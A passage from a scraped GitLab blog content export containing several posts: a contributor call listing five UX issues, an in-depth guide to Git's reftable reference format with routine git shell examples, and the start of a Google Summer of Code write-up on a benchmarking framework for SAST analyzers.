\n\n![Core Team pictures](https://about.gitlab.com/images/blogimages/3000-contributors/Core-team-pictures.png){: .shadow.medium.center}\nWelcome Lee and Natalia to the Core Team!\n{: .note.text-center}\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can\nlearn how you can contribute to GitLab's code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to [email me](mailto:rpaik@gitlab.com).\n\n**Read more about our GitLab contributors:**\n\n[New tools make contributing to GitLab easier](/blog/13-0-contributor-experience-update/)\n\n[Community contributions in 2019](/blog/community-update-for-2019/)\n\n[What's a GitLab Hackathon _really_ like?](/blog/q4-hackathon-recap/)\n",[267,9,708],"contributors",{"slug":710,"featured":6,"template":689},"3000-contributors-post","content:en-us:blog:3000-contributors-post.yml","3000 Contributors Post","en-us/blog/3000-contributors-post.yml","en-us/blog/3000-contributors-post",{"_path":716,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":717,"content":723,"config":731,"_id":733,"_type":14,"title":734,"_source":16,"_file":735,"_stem":736,"_extension":19},"/en-us/blog/5-problems-you-can-help-us-solve-right-now",{"title":718,"description":719,"ogTitle":718,"ogDescription":719,"noIndex":6,"ogImage":720,"ogUrl":721,"ogSiteName":673,"ogType":674,"canonicalUrls":721,"schema":722},"5 UX problems you can help us fix right now","“We spent 40 hours talking to 20 of you. 
Now we’ve got some issues we’d like your help on.”","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749682386/Blog/Hero%20Images/pexels-sevenstorm-juhaszimrus-704767.jpg","https://about.gitlab.com/blog/5-problems-you-can-help-us-solve-right-now","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 UX problems you can help us fix right now\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ben Leduc-Mills\"}],\n        \"datePublished\": \"2022-07-25\",\n      }",{"title":718,"description":719,"authors":724,"heroImage":720,"date":726,"body":727,"category":10,"tags":728},[725],"Ben Leduc-Mills","2022-07-25"," \n\nWe’ve all been there. You’re sailing along, being productive, and wham! Something inexplicably awful disrupts your workflow. You ask yourself, “How could _anyone_ think this was a good idea?” Maybe it’s a bug, slow performance, or bad design. One of the reasons we conduct [user experience research at GitLab](/handbook/product/ux/ux-research/) is to find these problems and report back to our teams so they can fix them. \n\n![Grumpy cat looking over computer](https://about.gitlab.com/images/blogimages/hhh13-tEMU4lzAL0w-unsplash__1_.jpg)\nWe've all been there\n{: .note.text-center}\n\nWith a product as rich and complex as GitLab, we find _a lot_ of problems. So many, in fact, we often can't fix them as fast as you find them. ([Although we do try!](/releases/2022/05/22/gitlab-15-0-released/#bug-fixes)) The great thing about GitLab is that [**everyone** can contribute](/company/mission/). This is the first in a new series of blog posts where the UX researchers at GitLab transform their findings into some great first contributions that community members can explore. 
\n\nWe recently spent 2 hours each with 20 people who use GitLab, going through specific tasks related to branch and merge request operations, and, predictably, we found plenty of things to work on (although this research focused on the code creation and review process) - you can check out the full report below:\n\n\u003Cfigure class=\"video_container\">\n\u003Ciframe style=\"border: 1px solid rgba(0, 0, 0, 0.1);\" width=\"800\" height=\"450\" src=\"https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Fproto%2FmF555KKsf1m1UyyXbWxXu2%2FBenchmarking-Slides%3Fnode-id%3D943%253A12915%26scaling%3Dscale-down%26page-id%3D40%253A124%26starting-point-node-id%3D943%253A12915\" allowfullscreen>\u003C/iframe>\n\u003C/figure>\n\n\nWithout further ado, here are five issues we would **love** your contributions on:\n\n1. [Show more branches in the drop down menu while reverting a merge request.](https://gitlab.com/gitlab-org/gitlab/-/issues/358218) \n1. [Increase the discoverability of the insert suggestion feature.](https://gitlab.com/gitlab-org/gitlab/-/issues/368716) \n1. [Fix data loss when switching from inline to side-by-side view on MR creation page.](https://gitlab.com/gitlab-org/gitlab/-/issues/358217) \n1. [Show selected labels within the dropdown menu.](https://gitlab.com/gitlab-org/gitlab/-/issues/322945) \n1. [Improve clarity of text-only buttons -- Move 'mark as draft' onto new line](https://gitlab.com/gitlab-org/gitlab/-/issues/358437) \n\nWondering where to start? Check out [this blog post](/blog/first-time-open-source-contributor-5-things-to-get-you-started/) and [our development guide](/community/contribute/development/) and become an all-star contributor! \n\nNeed guidance or help? 
Feel free to leave a comment directly on one of the issues linked above, or find support in the \"get help\" section [in our contributing guide](/community/contribute/#getting-help).\n\nContributing to an open source project also brings a ton of proven benefits you might not expect:\n\n- Contributing is one of the most efficient ways to learn, as it is learning by doing and [being guided by merge request coaches](https://handbook.gitlab.com/job-families/expert/merge-request-coach/). Contributing has been proven time and time again to be the best form of learning!\n- Public exposure and explicit appreciation from the open source community, which helps build your public profile And show your expertise ... you never know when that resume might come in handy! 😊 \n- You're in for a treat: **first-time** contributors receive GitLab swag, **regular** contributors (5 MRs or more) are eligible for the [GitLab Heroes program](/community/heroes), and **top** contributors may be invited to join the [GitLab Core team](/community/core-team/).\n\nAnd not only is this beneficial for you, but also for your employer (if you are employed). Because you are growing and learning at a rapid speed from the best, you will get a faster turnaround time when integrating a feature into the platform since you know how the system works. You will get more value from the most precious resource in the universe, time 🕐. Take advantage of this experience today. We are convinced of the benefits and we hope you and/or your employer are too now. Let's aim for the moon together. 
🚀 \n\n1,2,3...**let's go!**\n\nCover image by [SevenStorm JUHASZIMRUS](https://www.pexels.com/@sevenstormphotography/) on [Pexels](https://www.pexels.com/photo/123-let-s-go-imaginary-text-704767/)\n{: .note}\n",[708,267,9,729,730],"research","UX",{"slug":732,"featured":6,"template":689},"5-problems-you-can-help-us-solve-right-now","content:en-us:blog:5-problems-you-can-help-us-solve-right-now.yml","5 Problems You Can Help Us Solve Right Now","en-us/blog/5-problems-you-can-help-us-solve-right-now.yml","en-us/blog/5-problems-you-can-help-us-solve-right-now",{"_path":738,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":739,"content":745,"config":754,"_id":756,"_type":14,"title":757,"_source":16,"_file":758,"_stem":759,"_extension":19},"/en-us/blog/a-beginners-guide-to-the-git-reftable-format",{"title":740,"description":741,"ogTitle":740,"ogDescription":741,"noIndex":6,"ogImage":742,"ogUrl":743,"ogSiteName":673,"ogType":674,"canonicalUrls":743,"schema":744},"A beginner's guide to the Git reftable format","In Git 2.45.0, GitLab upstreamed the reftable backend to Git, which completely changes how references are stored. Get an in-depth look at the inner workings of this new format.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749664595/Blog/Hero%20Images/blog-image-template-1800x945__9_.png","https://about.gitlab.com/blog/a-beginners-guide-to-the-git-reftable-format","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A beginner's guide to the Git reftable format\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Patrick Steinhardt\"}],\n        \"datePublished\": \"2024-05-30\",\n      }",{"title":740,"description":741,"authors":746,"heroImage":742,"date":748,"body":749,"category":10,"tags":750},[747],"Patrick Steinhardt","2024-05-30","Until recently, the \"files\" format was the only way for Git to store references. 
With the [release of Git 2.45.0](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/), Git can now store references in a \"reftable\" format. This new format is a binary format that is quite a bit more complex, but that complexity allows it to address several shortcomings of the \"files\" format. The design goals for the \"reftable\" format include:\n\n- Make the lookup of a single reference and iteration through ranges of references as efficient and fast as possible.\n- Support for consistent reads of references so that Git never reads an in-between state when an update to multiple references has been applied only partially.\n- Support for atomic writes such that updating multiple references can be implemented as an all-or-nothing operation.\n- Efficient storage of both refs and the reflog.\n\nIn this article, we will go under the hood of the \"reftable\" format to see exactly how it works.\n\n## How Git stores references\n\nBefore we dive into the details of the \"reftable\" format, let's quickly recap how Git has historically stored references. If you are already familiar with this, you can skip this section.\n\nA Git repository keeps track of two important data structures:\n\n- [Objects](https://git-scm.com/book/en/v2/Git-Internals-Git-Objects), which contain the actual data of your repository. This includes commits, the directory tree structure, and the blobs that contain your source code. Objects point to each other, forming an object graph. Furthermore, each object has an object ID that uniquely identifies the object.\n\n- References, such as branches and tags, which are pointers into the object graph so that you can give objects names that are easier to remember and keep track of different tracks of your development history. For example, a repository may contain a `main` branch, which is a reference named `refs/heads/main` that points to a specific commit.\n\nReferences are stored in the reference database. 
Until Git 2.45.0, there was only the \"files\" database format. In this format, every reference is stored as a normal file that contains either one of the following:\n\n- A regular reference that contains the object ID of the commit it points to.\n- A symbolic reference that contains the name of another reference, similar to how a symbolic link points to another file.\n\nAt regular intervals, these references get packed into a single `packed-refs` file to make lookups more efficient.\n\nThe following examples should give an idea of how the \"files\" format operates:\n\n```shell\n$ git init .\n$ git commit --allow-empty --message \"Initial commit\"\n[main (root-commit) 6917c17] Initial commit\n\n# HEAD is a symbolic reference pointing to refs/heads/main.\n$ cat .git/HEAD\nref: refs/heads/main\n\n# refs/heads/main is a regular reference pointing to a commit.\n$ cat .git/refs/heads/main\n6917c178cfc3c50215a82cf959204e9934af24c8\n\n# git-pack-refs(1) packs these references into the packed-refs file.\n$ git pack-refs --all\n$ cat .git/packed-refs\n# pack-refs with: peeled fully-peeled sorted\n6917c178cfc3c50215a82cf959204e9934af24c8 refs/heads/main\n```\n\n## High-level structure of reftables\n\nAssuming that you've got Git 2.45.0 or newer installed, you can create a repository with the \"reftable\" format by using the `--ref-format=reftable` switch:\n\n```shell\n$ git init --ref-format=reftable .\nInitialized empty Git repository in /tmp/repo/.git/\n$ git rev-parse --show-ref-format\nreftable\n\n# Irrelevant files have been removed for ease of understanding.\n$ tree .git\n.git\n├── config\n├── HEAD\n├── index\n├── objects\n├── refs\n│   └── heads\n└── reftable\n\t├── 0x000000000001-0x000000000002-40a482a9.ref\n\t└── tables.list\n\n4 directories, 6 files\n```\n\nFirst, looking at the repository configuration, you will see it has an `extension.refstorage` key:\n\n```shell\n$ cat .git/config\n[core]\n    repositoryformatversion = 1\n    filemode = true\n    bare = false\n 
   logallrefupdates = true\n[extensions]\n    refstorage = reftable\n```\n\nThis configuration indicates to Git that the repository has been initialized with the \"reftable\" format and tells Git to use the \"reftable\" backend to access it.\n\nWeirdly enough, the repository still has a few files that look as if the \"files\" backend was in use:\n\n- `HEAD` would usually be a symbolic reference pointing to your currently checked-out branch. While it is not used by the \"reftable\" backend, it is required for Git clients to detect the directory as a Git repository. Therefore, when using the \"reftable\" format, `HEAD` is a stub with contents `ref: refs/heads/.invalid`.\n\n- `refs/heads` is a file with contents `this repository uses the reftable format`. Git clients that do not know about the \"reftable\" format would usually expect this path to be a directory. Consequently, creating this path as a file intentionally causes such older Git clients to fail if they tried to access the repository with the \"files\" backend.\n\nThe actual references are stored in the `reftable/` directory:\n\n```shell\n$ tree .git/reftable\n.git/reftable/\n├── 0x000000000001-0x000000000001-794bd722.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000001-794bd722.ref\n```\n\nThere are two files here:\n\n- `0x000000000001-0x000000000001-794bd722.ref` is a table containing references and the reflog data in a binary format.\n\n- `tables.list` is, well, a list of tables. In the current state of the repository, the file contains a single line, which is the name of the table. 
This file tracks the current set of active tables in the \"reftable\" database and is updated whenever new tables get added to the repository.\n\nUpdating a reference creates a new table:\n\n```shell\n$ git commit --allow-empty --message \"Initial commit\"\n[main (root-commit) 1472a58] Initial commit\n\n$ tree .git/reftable\n.git/reftable/\n├── 0x000000000001-0x000000000002-eb87d12b.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000002-eb87d12b.ref\n```\n\nAs you can see, the previous table has been replaced with a new one. Furthermore, the `tables.list` file has been updated to contain the new table.\n\n## The structure of a table\n\nAs mentioned earlier, the actual data of the reference database is contained in tables. Roughly speaking, a table is split up into multiple sections:\n\n- The \"header\" contains metadata about the table. Along with some other information, this includes the version of the format, the block size, and the hash function used by the repository (for example, SHA1 or SHA256).\n- The \"ref\" section contains your references. These records have a key that equals the reference name and point to either an object ID for regular references, or to another reference for symbolic references.\n- The \"obj\" section contains reverse mapping from object IDs to the references that point to those object IDs. These allow Git to efficiently look up which references point to a given object ID.\n- The \"log\" section contains your reflog entries. These records have a key that equals the reference name plus an index that represents the number of the log entry. 
Furthermore, they contain the old and new object IDs as well as the message for that reflog entry.\n- The \"footer\" contains offsets to the various sections.\n\n![long table with all the reftable sections](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_1_-_Reftable_overview.svg)\n\nEach of the section types are structured in a similar manner. Sections contain a set of records that are sorted by each record's key. For example, when you have two ref records `refs/heads/aaaaa` and `refs/heads/bbb`, you have two ref records with these reference names as their respective keys, and `refs/heads/aaaaa` would come before `refs/heads/bbb`.\n\nFurthermore, each section is divided into blocks of a fixed length. This block length is encoded in the header and serves two purposes:\n\n- Given the start of the section as well as the block size, the reader implicitly knows where each of the blocks starts. This allows Git to easily seek into the middle of a section without reading preceding blocks, which enables binary searches over blocks to speed up the lookup of records.\n- It ensures that the reader knows how much data to read from the disk at a time. Consequently, the block size is by default set to 4KiB, which is the most common sector size for hard disks. The maximum block size is 16MB.\n\nWhen we peek into, for example, a \"ref\" section, it looks roughly like the following graphic. Note how its records are ordered lexicographically inside the blocks, but also across the blocks.\n\n![reference block uncompressed](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_2_-_Ref_block_uncompressed.svg)\n\nEquipped with the current information, we can locate a record by using the following steps:\n\n1. Perform a binary search over the blocks by looking at the keys of their respective first records, identifying the block that must contain our record.\n\n2. 
Perform a linear search over the records in that block.\n\nBoth of these steps are still somewhat inefficient. If we have many blocks we may have to read logarithmically many of them in our binary search to find the desired one. And when blocks contain many records, we potentially have to read all of them during the linear search.\n\nThe \"reftable\" format has additional built-in mechanisms to address these performance concerns. We will touch on these over the next few sections.\n\n### Prefix compression\n\nAs you may have noticed, all of the record keys share the same prefix `refs/`. This is a common thing in Git:\n\n- All branches start with `refs/heads/`.\n- All tags start with `refs/tags/`.\n\nTherefore, we expect that subsequent records will most likely share a significant prefix of their key. This is a good opportunity to save some precious disk space. Because we know that most keys will share a common prefix, it makes sense to optimize for this.\n\nThe optimization uses prefix compression. Every record encodes a prefix length that tells the reader how many bytes to reuse from the key of the preceding record. If we have two records, `refs/heads/a` and `refs/heads/b`, the latter can be encoded by specifying a prefix length of 11 and then only storing the suffix `b`. The reader will then take the first 11 bytes of `refs/heads/a`, which is `refs/heads/`, and append the suffix `b` to it.\n\n![prefix compression](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_3_-_Ref_block_prefix_compression.svg)\n\n### Restart points\n\nAs explained earlier, the best way to search for a reference in a block with our current understanding of the \"reftable\" format is to do a linear search. This is because records do not have a fixed length, so it is impossible for us to tell where records would start without scanning through the block from the beginning. 
Also, even if records were of fixed length, we would not be able to seek into the middle of a block because the prefix compression also requires us to read preceding records.\n\nDoing a linear search would be quite inefficient because blocks may contain hundreds or even thousands of records. To address this issue, the \"reftable\" format encodes so-called restart points into every block. Restart points are uncompressed records where the prefix compression is reset. Consequently, records at restart points always contain their full key and it becomes possible to directly seek to and read the record without having to read preceding records. These restart points are listed in the footer of each block.\n\nEquipped with this information, we can avoid performing a linear search over the block. Instead, we can now do a binary search over the restart points where we search for the first restart point with a key larger than the sought-after key. From there, it follows that the desired record must be located in the section spanning from the _preceding_ restart point to the identified one.\n\nThus, our initial procedure to look up a record (binary search for the block, linear search for the record) is now:\n\n1. Perform a binary search over the blocks, identifying the block that must contain our record.\n\n2. Perform a binary search over the restart points, identifying the sub-section of the block that must contain our record.\n\n3. Perform a linear search over the records in that sub-section.\n\n![Linear search for a record](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_4_-_Restart_points.svg)\n\n### Indices\n\nWhile the search for records inside a block is now reasonably efficient, it's still inefficient to locate the block itself. A binary search may be reasonably performant when you have a couple of blocks, but repositories with millions of references may have hundreds or even thousands of blocks. 
Without any additional data structure, this would cause logarithmically many disk seeks on average.\n\nTo avoid this, every section may be followed by an index section that provides an efficient way to look up a block. Each index record holds the following information:\n\n- The location of the block that it is indexing.\n- The key of the last record of the block that it is indexing.\n\nWith three or less blocks, a binary search will always require, at most, two disk reads to find the desired target block. This is the same number of reads we would have to do with an index: one to read the index itself and one to read the desired block. Consequently, indices are only written when they would actually save some reads, which is the case with four or more indexed blocks.\n\nNow the question is: What happens when the index itself becomes so large that it spans over multiple blocks? You might have guessed it: We write another index that indexes the index. These multi-level indices really only become necessary once you have repositories with hundreds of thousands of references.\n\nEquipped with these indices, we can now make the procedure to look up records even more efficient:\n1. Determine whether there is an index by looking at the footer of the table.\n\t- If there is one, perform a binary search over the index to find the desired block. This block may point into an index block itself, in which case we need to repeat this step until we hit a record of the desired type.\n\t- Otherwise, perform a binary search over the blocks as we did before.\n2. Perform a binary search over the restart points, identifying the sub-section of the block that must contain our record.\n3. Perform a linear search over the records in that sub-section.\n\n## Multiple tables\n\nUp to this point, we have only discussed how to read a _single_ table. 
But as the name `tables.list` indicates, you can actually have a list of tables in your \"reftable\" database.\n\nEvery time you update a reference in your repository, a new table is written and appended to `tables.list`. Thus, you will eventually end up with multiple tables:\n\n```shell\n$ tree .git/reftable/\n.git/reftable/\n├── 0x000000000001-0x000000000007-8dcd8a77.ref\n├── 0x000000000008-0x000000000008-30e0f6f6.ref\n└── tables.list\n\n$ cat .git/reftable/tables.list\n0x000000000001-0x000000000007-8dcd8a77.ref\n0x000000000008-0x000000000008-30e0f6f6.ref\n```\n\nReading the actual state of a repository requires us to merge these multiple tables into a single virtual table.\n\nYou might be wondering: If a table is written for each reference update and the same reference is updated multiple times, how does the \"reftable\" format know the most up-to-date value of a given reference? Intuitively, one could assume the value would be the one from the newest table containing the reference.\n\nIn fact, every single record has a so-called update index that encodes the \"priority\" of a record. For example, if two ref records with the same name exist, then the one with the higher update index overrides the one with the lower update index.\n\nThese update indices are visible in the file structure above. The long hex strings (for example `0x000000000001`) are the update indices, where the left-hand side of the table name is the minimum update index contained in the table and the right-hand is the maximum update index.\n\nMerging the tables then happens via a [priority queue](https://en.wikipedia.org/wiki/Priority_queue) that is ordered by the key of the ref record as well as its update index. Assuming we want to scan through all ref records, we would:\n\n1. 
For every table, add its first record to the priority queue.\n\n![Adding first record to the priority queue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_5_-_Priority_queue_1.svg)\n\n2. Yield the head of the priority queue. Because the queue is ordered by update index, it must be the most up-to-date version. Add the next item from that table to the priority queue.\n\n![Yielding the head of the priority queue](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_6_-_Priority_queue_2.svg)\n\n3. Drop all records from the queue that have the same name. These records are shadowed, which means that they will not be shown. For each table for which we are dropping records, add the next record to the priority queue.\n\n![Dropping all records from queue that have the same name](https://res.cloudinary.com/about-gitlab-com/image/upload/v1749675179/Blog/Content%20Images/Frame_7_-_Priority_queue_3.svg)\n\nNow we can rinse and repeat to read records for other keys.\n\nTables may contain special \"tombstone\" records that mark a record as having been deleted. This allows us to delete records without having to rewrite all tables to not contain the record anymore.\n\n### Auto-compaction\n\nWhile the idea behind the priority queue is simple enough, it would be rather inefficient to merge together hundreds or even only dozens of tables in this way. So while it is true that every update to your references appends a new table to your `tables.list` file, it is only part of the story.\n\nThe other part is auto-compaction: After a new table has been appended to the list of tables, the \"reftable\" backend checks whether some of the tables should be merged. This is done by using a simple heuristic: We check whether the list of tables forms a [geometric sequence](https://en.wikipedia.org/wiki/Geometric_progression) with the file sizes. 
Every table `n` must be at least twice as large as the next-most-recent table `n + 1`. If that geometric sequence is violated, the backend will compact tables so that the geometric sequence is restored.\n\nOver time, this will lead to structures that look like the following:\n\n```shell\n$ du --apparent-size .git/reftable/*\n429    .git/reftable/0x000000000001-0x00000000bd7c-d9819000.ref\n101    .git/reftable/0x00000000bd7d-0x00000000c5ac-c34b88a4.ref\n32    .git/reftable/0x00000000c5ad-0x00000000cc6c-60391f53.ref\n8    .git/reftable/0x00000000cc6d-0x00000000cdc1-61c30db1.ref\n3    .git/reftable/0x00000000cdc2-0x00000000ce67-d9b55a96.ref\n1    .git/reftable/0x00000000ce68-0x00000000ce6b-44721696.ref\n1    .git/reftable/tables.list\n```\n\nNote how for every single table, the property `size(n) > size(n+1) * 2` holds.\n\nOne of the consequences of auto-compaction is that the \"reftable\" backend maintains itself. We no longer have to run `git pack-refs` in a repository.\n\n## Want to learn more?\n\nYou should now have a good understanding of how the new \"reftable\" format works under the hood. 
If you want to dive even deeper into the format, you can refer to the [technical documentation](https://git-scm.com/docs/reftable) provided by the Git project.\n\n> Read our [Git 2.45.0 recap](https://about.gitlab.com/blog/whats-new-in-git-2-45-0/) to find out what else is in this version of Git.",[751,752,9,753],"git","tutorial","performance",{"slug":755,"featured":91,"template":689},"a-beginners-guide-to-the-git-reftable-format","content:en-us:blog:a-beginners-guide-to-the-git-reftable-format.yml","A Beginners Guide To The Git Reftable Format","en-us/blog/a-beginners-guide-to-the-git-reftable-format.yml","en-us/blog/a-beginners-guide-to-the-git-reftable-format",{"_path":761,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":762,"content":768,"config":781,"_id":783,"_type":14,"title":784,"_source":16,"_file":785,"_stem":786,"_extension":19},"/en-us/blog/a-benchmarking-framework-for-sast",{"title":763,"description":764,"ogTitle":763,"ogDescription":764,"noIndex":6,"ogImage":765,"ogUrl":766,"ogSiteName":673,"ogType":674,"canonicalUrls":766,"schema":767},"A Google Summer of Code project: creating a benchmarking framework for SAST","Our 2022 Google Summer of Code project helped to create a benchmarking framework for SAST.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749677267/Blog/Hero%20Images/benchmarking.png","https://about.gitlab.com/blog/a-benchmarking-framework-for-sast","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"A Google Summer of Code project: creating a benchmarking framework for SAST\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Michael Henriksen\"},{\"@type\":\"Person\",\"name\":\"Martynas Krupskis\"},{\"@type\":\"Person\",\"name\":\"Mark Art\"},{\"@type\":\"Person\",\"name\":\"Dinesh Bolkensteyn\"},{\"@type\":\"Person\",\"name\":\"Isaac Dawson\"},{\"@type\":\"Person\",\"name\":\"Julian Thome\"}],\n        \"datePublished\": 
\"2022-09-27\",\n      }",{"title":763,"description":764,"authors":769,"heroImage":765,"date":776,"body":777,"category":10,"tags":778},[770,771,772,773,774,775],"Michael Henriksen","Martynas Krupskis","Mark Art","Dinesh Bolkensteyn","Isaac Dawson","Julian Thome","2022-09-27","In summer 2022, the [Vulnerability Research team at GitLab](/handbook/engineering/development/sec/secure/vulnerability-research/) \nlaunched the [Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) project: \n[A benchmarking framework for SAST](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/gsoc-2022/-/issues/1).\n\nThe goal of the project was to create a benchmarking framework, which would assess the\nimpact and quality of a security analyzer or configuration change before it reaches the production environment.\n\n## Preliminaries \n\n### GitLab SAST\n\nAs a complete DevOps Platform, GitLab has a variety of integrated [static analysis (SAST) tools](/direction/secure/static-analysis/sast/) \nfor different languages and frameworks. These tools help developers find\nvulnerabilities as early as possible in the software development lifecycle.\nThese tools are constantly being updated, either by upgrading the underlying\nsecurity analyzers or by applying configuration changes.\n\nSince all the integrated SAST tools are very different in terms of\nimplementation, and depend on different tech stacks, they are all\nwrapped in Docker images. The wrappers translate tool-native vulnerability\nreports to a [generic, common report format](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format) which is\nmade available by means of the `gl-sast-report.json` artifact. This generic\nreport is GitLab's common interface between analyzers and the GitLab Rails\nbackend.\n\nBenchmarking is important to assess the efficacy of analyzers and helps to make\ndata-driven decisions. 
For example, benchmarking is useful for QA testing\n(spotting regressions), for data-driven decision making, and for research by\nassessing the progression of the GitLab security feature performance over time.\n\n### Google Summer Of Code (GSoC)\n\n[Google Summer of Code (GSoC)](https://summerofcode.withgoogle.com/) \nis a 10-week program that enlists contributors to work on open source projects\nin collaboration with open source organizations. For GSoC 2022, GitLab offered\nfour projects to GSoC contributors. The contributors completed each of the\nprojects with the guidance from GitLab team members who mentored them and\nprovided regular feedback and assistance when needed.\n\n### Terms & Notation\n\nIn this blog post, we use the terms/acronyms below to classify findings reported by security analyzers.\n\n| Acronym   | Meaning        | Description                                                        |\n|-------|----------------|--------------------------------------------------------------------|\n| _TP_  | True Positive  | Analyzer correctly identifies a vulnerability.                     |\n| _FP_  | False Positive | Analyzer misidentifies a vulnerability or reported a vulnerability where none exist. |\n| _TN_  | True Negative  | Analyzer correctly ignores a potential false positive.             |\n| _FN_  | False Negative | Analyzer does not report a known vulnerability.                    |\n\nFor the figures in the blog post we use the following notation: processes are\ndepicted as rounded boxes, whereas artifacts (e.g., files) are depicted as\nboxes; arrows denote an input/output (IO) relationship between the connected nodes.\n\n``` mermaid\nflowchart TB;\nsubgraph legend[ Legend ]\n   proc(Process);\n   art[Artifact];\n   proc -->|IO relation|art;\nend\n``` \n\n## Motivation\n\nThe authors of the paper [How to Build a Benchmark](https://dl.acm.org/doi/10.1145/2668930.2688819) distilled the desirable characteristics of a benchmark below:\n> 1. 
Relevance: How closely the benchmark behavior correlates to behaviors that are of interest to consumers of the results.\n> 2. Reproducibility: The ability to consistently produce similar results when the benchmark is run with the same test configuration.\n> 3. Fairness: Allowing different test configurations to compete on their merits without artificial limitations.\n> 4. Verifiability: Providing confidence that a benchmark result is accurate.\n> 5. Usability: Avoiding roadblocks for users to run the benchmark in their test environments.\n\nThere currently is no standard nor de facto language-agnostic SAST benchmark\nsatisfying all the criteria mentioned above. Many benchmark suites focus on\nspecific languages, are shipped with incomplete or missing ground-truths, or\nare based on outdated technologies and/or frameworks. A ground-truth or\nbaseline is the set of findings a SAST tool is expected to detect.\n\nThe main objective of the GSoC project was to close this gap and start to\ncreate a benchmarking framework that addresses all the desirable characteristics\nmentioned above in the following manner:\n\n1. Relevance: Include realistic applications (in terms of size, framework usage\n   and customer demand).\n2. Reproducibility: Automate the whole benchmarking process in CI.\n3. Fairness: Make it easy to integrate new SAST tools by just tweaking the CI\n   configuration and use the [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format) as a common standard.\n4. Verifiability: Assemble a baseline that includes all the relevant\n   vulnerabilities and make it publicly available. The baseline is the north star\n   that defines what vulnerabilities are actually included in a test application. \n5. 
Usability: Benchmark users can just integrate the benchmark as a downstream\n   pipeline to their CI configuration.\n\n## A benchmarking framework for SAST\n\nThe benchmarking framework compares the efficacy of an analyzer against a known\nbaseline. This is very useful for monitoring the efficacy of the analyzer that\nparticipates in the benchmarking. The baseline is the gold standard that serves\nas a compass to guide analyzer improvements.\n\n### Usage\n\nFor using the framework, the following requirements have to be met:\n1. The analyzer has to be dockerized.\n1. The analyzer has to produce a vulnerability report that adheres to the\n   [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format)\n   format, which serves as our generic intermediate representation to compare\n   analyzer efficacy. \n1. The baseline expectations have to be provided as \n   [GitLab security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format)\n   so that we can compare the analyzer output against it. \n\nThe framework is designed in such a way that it can be easily integrated into\nthe CI configuration of existing GitLab projects by means of a [downstream pipeline](https://docs.gitlab.com/ee/ci/pipelines/downstream_pipelines.html).\nThere are many possible ways in which a downstream pipeline can be triggered:\nsource code changes applied to an analyzer, configuration changes\napplied to an analyzer, or scheduled pipeline invocation. By using the pipeline,\nwe can run the benchmarking frameworks continuously and instantaneously on the GitLab\nprojects that host the source code of the integrated analyzers whenever code or\nconfiguration changes are applied. 
\n\n### Architecture \n\nThe figure below depicts the benchmarking framework when comparing an analyzer\nagainst a baseline.\n\nWe assume that we have a baseline configuration available; a baseline consists\nof an application that is an actual test application that includes\nvulnerabilities. These vulnerabilities are documented in an expectation file\nthat adheres to the [security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format).\n\nNote that we use the terms baseline and expectation interchangeably. As\nmentioned earlier, the benchmarking framework is essentially a GitLab pipeline\nthat can be triggered downstream. The configured analyzer then takes the\nbaseline app as input and generates a `gl-sast-report.json` file. The heart of the\nbenchmarking framework is the `compare` step, which compares the baseline\nagainst the report generated by the analyzer, both of which adhere to the\n[security report schema](https://docs.gitlab.com/ee/user/application_security/sast/#reports-json-format).\n\nThe compare step also computes the _TP_, _FN_ and _FP_ that have been reported by the\nanalyzer and computes different metrics based on this information. The compare\nstep is implemented in the\n[evaluator tool](https://gitlab.com/gitlab-org/secure/gsoc-sast-benchmark/evaluator). 
